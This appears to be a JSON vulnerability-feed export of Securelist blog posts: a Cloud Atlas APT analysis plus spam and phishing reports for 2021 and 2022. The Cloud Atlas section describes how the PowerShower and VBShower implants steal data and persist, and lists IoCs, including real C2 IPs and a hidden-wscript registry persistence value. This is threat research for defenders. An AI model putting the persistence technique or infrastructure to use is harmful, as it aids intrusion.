Also be on the lookout for websites offering compensation payments: if previous quarters are anything to go by, cybercriminals will continue to find new and enticing ways to lure their victims.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-01T12:00:26", "type": "securelist", "title": "Spam and phishing in Q3 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2021-11-01T12:00:26", "id": "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "href": "https://securelist.com/spam-and-phishing-in-q3-2021/104741/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-12T19:33:22", "description": "\n\nAlso known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. 
We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates - whitelisted per victim - hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its \"validator\" implant named \"PowerShower\" directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed [five years ago in our first blogpost about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences between the two versions reside mostly in anti-forensics features for the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - takes three commands:\n\n**Command** | **Description** \n---|--- \n0x80 (Ascii \"P\") | It is the first byte of the magic PK. The implant will save the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x79 (Ascii \"O\") | It is the first byte of \"On resume error\". The implant saves the received content as a VBS script under \"%APPDATA%\\Microsoft\\Word\\\\[A-Za-z]{4}.vbs\" and executes it by using Wscript.exe \nDefault | If the first byte doesn't match 0x80 or 0x79, the content is saved as an XML file under \"%TEMP%\\temp.xml\". After that, the script loads the content of the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \nAfter executing the commands, the script deletes \"%TEMP%\\temp.xml\" and sends the content of \"%TEMP%\\pass.txt\" to the C2 via an HTTP POST request. 
\n \nA few modules deployed by PowerShower have been seen in the wild, such as:\n\n * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB modified during the last two days;\n * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower but the condition leading to the execution of that feature is never met in the recent versions of PowerShower;\n * A password stealer module which uses the opensource tool LaZagne to retrieve passwords from the infected system.\n\nWe haven't yet seen a VBS module dropped by this implant, but we think that one of the VBS scripts dropped by PowerShower is a dropper of the group's second stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## And his new friend, VBShower\n\nDuring its recent campaigns, Cloud Atlas used a new \"polymorphic\" infection chain, no longer relying on PowerShower directly after infection, but executing a polymorphic HTA hosted on a remote server, which is used to drop three different files on the local system.\n\n * A backdoor that we name **VBShower** which is polymorphic and replaces PowerShower as a validator;\n * A tiny launcher for VBShower;\n * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.\n\nThis \"polymorphic\" infection chain allows the attacker to try to prevent IoC-based defence, as each code is unique per victim, so it can't be searched via file hash on the host.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)\n\nThe VBShower backdoor has the same philosophy as the validator version of PowerShower. 
Its aim is to complicate forensic analysis by trying to delete all the files contained in \"%APPDATA%\\\\..\\Local\\Temporary Internet Files\\Content.Word\" and \"%APPDATA%\\\\..\\Local Settings\\Temporary Internet Files\\Content.Word\\\".\n\nOnce these files have been deleted and its persistence is achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and tries to get via HTTP a VBS script to execute from the remote server every hour.\n\nAt the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second stage modular backdoor which communicates to a cloud storage service via Webdav.\n\n## Final words\n\nCloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.\n\nUnlike many other intrusion sets, Cloud Atlas hasn't chosen to use open source implants during its recent campaigns, in order to be less discriminating. 
More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. 
The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users the chance to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. 
Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. The vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered users a COVID vaccination certificate in exchange for entering their British National Health Service (NHS) account credentials. 
Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" had found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. 
By getting the user's secret phrase, cybercriminals could get access to their cryptocurrency balance.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)\n\nIn a typical internet hoax manner, crypto scam sites offered visitors a chance to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payments in cryptocurrency \u2014 which they promised to give away and which they were trying to steal. The "giveaways" were timed to coincide with events that were directly or indirectly associated with cryptocurrency. Thus, one of the fake sites promised prizes on the occasion of Nvidia's thirty-year anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promotion of cryptocurrency use was another pretext for the "giveaways". Users were invited to deposit up to 100 cryptocurrency units for a promise to refund two times that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax would: the self-professed altruists went off the radar once they received the deposit.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)\n\n### Compensation, bonus, and paid survey scams\n\nBonuses and compensations are hard to deny in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.\n\n"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were offered a one-time payment or a fee for taking a service quality survey. Unlike the prizes offered in the aforementioned crypto schemes, these fees were smaller: an equivalent of $30\u201340. 
The cybercriminals used an array of techniques to lull victims into a false sense of security: company logos, assurances that the campaigns were legit, as well as detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example, the Polish finance ministry.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)\n\nAid as distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program that aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while observers buy more than they normally do and may be faced with a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure that their name was on the list of recipients, so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts\u2014nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them. 
In addition to that, they might ask the victim to cover the "shipping costs".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)\n\nGrowing utility rates and an increase in the price of natural resources have prompted several governments to start discussing compensations for the population. Payout notices could arrive by mail, email, or as a text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites, promising cash for covering utility payments or compensation of utility expenses. Visitors were occasionally asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of \u00a3400 was supposed to make the victim drop their guard and share their personal information.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)\n\nIn Singapore, scammers offered a refund of water supply costs, purportedly because of double billing. 
An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)\n\n### Fake online stores and large vendor phishing\n\nWe see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)\n\n"Insides" about "private sales" were also used as a lure. Thus, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being really low prices and the URL in the address bar not matching the official one.\n\nMany large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing. 
The risk associated with making a purchase was losing a substantial amount of money and never receiving what was ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)\n\n### Hijacking of social media accounts\n\nUsers of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but do so without the other party knowing. Cybercriminals who were after their account credentials offered victims a way to have their cake and eat it too, by means of some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls, and track who has been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)\n\nMany Instagram users dream about the Blue Badge, which stands for a verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was to enter their account logins and passwords.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)\n\nRussia blocked access to both Facebook and Instagram in March 2022, which led to the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check if Russian social media contained any embarrassing materials on the victim. 
The scam operators told the users it was possible to find damaging information about every third user of a social network by running a search. If the user agreed to have a search done for them, they were told that a certain amount of dirty linen indeed had been found. In reality, there was no search \u2014 the scammers simply stole the credentials they requested for the check.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)\n\nOne of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)\n\nThe Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge or simply promised to give one away for free if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)\n\nOne more phishing campaign targeting Telegram users was arranged to coincide with the New Year's celebration. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent a link to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it. 
The cybercriminals were betting on the users going straight to voting, without checking the authenticity of the drawings, which had been copied from various past years' competition pages, as requests to vote for one's friends' kids are common before public holidays.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)\n\nThe Telegram auction platform named Fragment went live in October 2022: it was selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was requested to log in. If the victim entered their credentials, the scam operators immediately grabbed those.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)\n\n## Spam in 2022\n\n### The pandemic\n\nUnlike phishing, COVID-themed spam is still a thing. Most of that is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts, and to improve the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even if they are not a Facebook user. Recipients are told that they could claim some IMF money left unallocated because of the pandemic. 
Others are offered hefty amounts under an anti-recession assistance program.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)\n\nThe amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had fallen threefold by year-end.\n\n### Contact form spam\n\nThe year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites that offer registration, contact, or support request forms that do not require the user to be logged in to submit, and do not check the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields, and in others, add a longer text with images to the message field. Then the attackers add victims' email addresses to the contact fields and submit. When getting a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)\n\nMost scam messages offer a compensation or prize to the recipient. For example, a spam email targeting Russian users promised an equivalent of $190\u20134200 in VAT refunds. To get the money, the victim was instructed to open the link in the message. This scheme is a classic: a linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant in comparison to the promised refund. 
We observed many varieties of contact form money scams: from fuel cards to offers to make money on some online platform.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)\n\nScammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" \u2014 in fact, populated by bots \u2014 where the victims would no doubt be asked to pay for a premium account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)\n\nWe blocked upward of a million scam emails sent via legitimate forms in 2022.\n\n### Blackmail in the name of law enforcement agencies\n\nExtortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued, but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image with text. In addition, the geography of mailings widened in 2022.\n\nThe essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient for allegedly visiting sites containing child pornography.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)\n\nTo avoid serious consequences, the attackers urged the victim to respond as soon as possible to the sender and "settle the matter". Most likely, the scammers would ask for a certain amount of money to be paid in further correspondence for the victim's name to be removed from the "criminal case". 
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian and Serbian.\n\n### Exploiting the news\n\nSpammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing transferring money, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand the transfer of money to Bitcoin wallets, as it is more difficult to trace the recipient through cryptocurrency transactions than through bank transfers. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)\n\nThe news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails where fraudsters were requesting help on behalf of a Russian millionaire, who allegedly wanted to invest money and avoid sanctions. Another mailing said that the European Commission had decided to give away a fund created by Russian oligarchs, and the email recipient might be lucky to get a piece of this pie.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)\n\nMore and more "business offers" are appearing among spam mailings, and they exploit the current information agenda. Due to economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia. 
The email text emphasized the fact that many transport companies refused to provide such services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)\n\nThere were also spam mailings where various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam propositions for intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)\n\nThe shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)\n\nSpammers in 2022 also actively marketed their promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram. For example, in April we blocked around a million such mailings.\n\nAgainst the backdrop of sanctions and the accompanying disruption of supply chains, there has been an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and the number of them was growing, from around 700,000 in the first quarter to more than a million in the fourth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)\n\n### Spam with malicious attachments\n\nEmployees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted. 
Attackers have become more active in imitating business correspondence, not only targeting HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and applying business language. They also actively exploited the current news agenda and mentioned real employees from the company supposedly sending the emails. Spammers faked their messages as internal company correspondence, business correspondence between different organizations, and even as notifications from government agencies.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)\n\nMasking malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year, we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing correspondence from previously infected computers) and sent malicious files or links to all of its participants in response to the previous email. This trick makes it harder to keep track of malicious emails, and the victim is more likely to fall for it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)\n\nIn most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened. 
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows attackers to gain access to emails and steal them for further attacks.\n\nMailings imitating notifications from various ministries and other government organizations have become more frequent in the Runet. Emails were often designed to take into account the specific activities of the organizations they were pretending to be. The sender's addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.\n\nThe perpetrators did not ignore the news agenda. In particular, the malware was distributed under the guise of a call-up "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".\n\nIn the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.\n\n## Two-stage spear phishing using a known phish kit\n\nIn 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services. 
After the victim responds to this email, the attackers start a phishing attack.\n\nKey facts:\n\n * Attackers use fake Dropbox pages created using a well-known phishing kit\n * The campaign targets the sales departments of manufacturers and suppliers of goods and services\n * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)\n\n### Statistics\n\nThe campaign began in April 2022, with malicious activity peaking in May, and ended by June.\n\n_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_\n\n### How a phishing campaign unfolds\n\nAttackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address from a free domain, like gmail.com, may raise doubts. The email in the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different from the name in the signature.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)\n\n**_Example of the first email_**\n\nIt is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick in blocking email addresses spotted sending spam. 
